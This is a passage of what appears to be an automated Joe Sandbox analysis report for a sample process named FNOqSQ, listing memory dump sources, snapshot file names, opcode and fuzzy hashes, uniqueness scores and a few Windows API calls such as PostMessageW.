                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: d19a48bbabaf74c6c0756abae8f607558abc6e6a2bde36bc58163c236699b7c3
                                                        • Instruction ID: c52038e0fdd3a44c14c9beb2c27d5d0710f05454b82ebdca209f849187acdcf4
                                                        • Opcode Fuzzy Hash: d19a48bbabaf74c6c0756abae8f607558abc6e6a2bde36bc58163c236699b7c3
                                                        • Instruction Fuzzy Hash: 31110FB5C003498FDB20DF9AD444ADEFBF4AB88320F10856AD4A8A7610C379A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07368EBD
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1691028872.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7360000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: fed36dd2fe0ed36dc9977e91cd0c3bda48c7ed69404cd698397d34e0f9aabdd4
                                                        • Instruction ID: 0a9cecc9e470f3f835c2553c0c04284438ef2f9ebbea089fb07f9f01b9d3b4bb
                                                        • Opcode Fuzzy Hash: fed36dd2fe0ed36dc9977e91cd0c3bda48c7ed69404cd698397d34e0f9aabdd4
                                                        • Instruction Fuzzy Hash: 1111F2B98003499FDB10DF9AD488BDFBBF8EB48320F108459E558A7600D379A984CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07368EBD
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1691028872.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7360000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: ba95e968d0636545426c6da9bf318a6d12df647bce6d24baedc42ae95dc44077
                                                        • Instruction ID: 6ff4a81dc0822611fe700c88051319d7c81a3e36c93db04df8a84c5ea9b5edc8
                                                        • Opcode Fuzzy Hash: ba95e968d0636545426c6da9bf318a6d12df647bce6d24baedc42ae95dc44077
                                                        • Instruction Fuzzy Hash: 7011F5B58003499FDB10DF99D489BDFBBF8EB48320F10841AD558A7600D775A584CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 0736B978
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1691028872.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7360000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: 0937af7f247516b3b41bbdd06070bede3fa7436b7a1b839afbad234664289ee9
                                                        • Instruction ID: dd906a6ead878863f2a840fa0a9319149270228fc4afec8400035a0fa16e5801
                                                        • Opcode Fuzzy Hash: 0937af7f247516b3b41bbdd06070bede3fa7436b7a1b839afbad234664289ee9
                                                        • Instruction Fuzzy Hash: 651103B5800359CFDB10DF9AC549BDEFBF4EB48320F20842AD558A7254D778A984CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686209908.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_e9d000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3a5d48c4f1a1e27c6ed95b20d8163e3179673e94a6faf384c88c56de29862f5a
                                                        • Instruction ID: 03cc6aefe4375e1732910016e66a8ec2c4e2dbaaa5fd411ca41208975b767cfd
                                                        • Opcode Fuzzy Hash: 3a5d48c4f1a1e27c6ed95b20d8163e3179673e94a6faf384c88c56de29862f5a
                                                        • Instruction Fuzzy Hash: 7D212271508240EFCF05DF14DEC0B2ABF65FB98328F20C569E8096B256C336D856CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686209908.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_e9d000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cd7ebf2db242a1af68d09b6d45b56c406367ce82a8ad80c443635432cdbf1319
                                                        • Instruction ID: ec4822a67da35c6fa5690d51f3a52dd9a923d90664bcd0b42621036c06f6ed53
                                                        • Opcode Fuzzy Hash: cd7ebf2db242a1af68d09b6d45b56c406367ce82a8ad80c443635432cdbf1319
                                                        • Instruction Fuzzy Hash: BD212871508204DFDF05DF14DDC0B2ABF65FB94324F20C169D9095B256C336E856C6A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686280798.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_ead000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 09fa889b29638d1078b03d6b42bbf8f0eb17ec0be8726901b4753ec290e2961f
                                                        • Instruction ID: d7fee10976a68046a7b83d2e805af0cd2f57f965cceba961e5fbb40cf31af373
                                                        • Opcode Fuzzy Hash: 09fa889b29638d1078b03d6b42bbf8f0eb17ec0be8726901b4753ec290e2961f
                                                        • Instruction Fuzzy Hash: D021F271608200DFCB14DF24D9C4B26BFA6EB89318F20C569D84A5F696C33AE847CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686280798.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_ead000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d7954570cbddf88492e86b486ebb1ae0788f532e192aeff1ebc0a36bdfa654f4
                                                        • Instruction ID: a56ce0e979cc19267c965acfe447cd204c7acbbd2c34e91bb5a1a8a6f00e7743
                                                        • Opcode Fuzzy Hash: d7954570cbddf88492e86b486ebb1ae0788f532e192aeff1ebc0a36bdfa654f4
                                                        • Instruction Fuzzy Hash: A2212971508204DFDB05DF54DDC4B26BBA5FB89318F20C56DD80A5F665C336E846CA71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686280798.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_ead000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c0fecab3f56438aef26605e51028ee205210c68ff79a9c9d74eb8f7527940260
                                                        • Instruction ID: ec7583b9c6509263f0f0458e2a40f9cf728cb048542daed85adc9d1a422896f7
                                                        • Opcode Fuzzy Hash: c0fecab3f56438aef26605e51028ee205210c68ff79a9c9d74eb8f7527940260
                                                        • Instruction Fuzzy Hash: A82141755093808FDB12CF24D9D4715BF72EB46214F28C5DAD8498F6A7C33A980ACB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686209908.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_e9d000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                        • Instruction ID: 8d814bcb7762500693cc7291dab1d8df7d512659a71ee9dd44b0e9f6d92f8188
                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                        • Instruction Fuzzy Hash: 07110376404280CFCF02CF10D9C4B16BF71FB94328F24C6A9D8094B256C336D85ACBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686209908.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_e9d000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                        • Instruction ID: dc4809fb5d0942b7945b0249c5f9bf69af0d5c160a399ef89d253f91a1cd0b5f
                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                        • Instruction Fuzzy Hash: F5110372404240DFCF12CF00D9C4B16BF71FB94328F24C2A9D8090B256C33AE85ACBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686280798.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_ead000_FNOqSQ.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686209908.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_e9d000_FNOqSQ.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686209908.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_e9d000_FNOqSQ.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%